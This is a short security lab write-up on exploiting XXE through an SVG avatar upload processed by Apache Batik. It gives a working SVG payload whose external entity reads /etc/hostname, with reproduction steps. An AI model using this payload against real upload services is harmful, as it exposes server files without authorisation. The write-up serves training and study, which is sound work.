Exploiting XXE via image file upload

Description

This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.

Reproduction and proof of concept

  1. Create a local SVG image with the following content:

<?xml version="1.0" standalone="yes"?>
    <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
    <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
        <text font-size="16" x="0" y="16">&xxe;</text>
    </svg>

  1. Post a comment on a blog post, and upload this image as an avatar.

  2. View the image via the source code of the Blog page with the comment(s). When you view the comment, you should see the contents of the /etc/hostname file in the image. Use the “Submit solution” button to submit the value of the server hostname.

Exploitability

An attacker needs to upload an image that displays the contents of the /etc/hostname file after processing, and then use the “Submit solution” button to submit the value of the server hostname.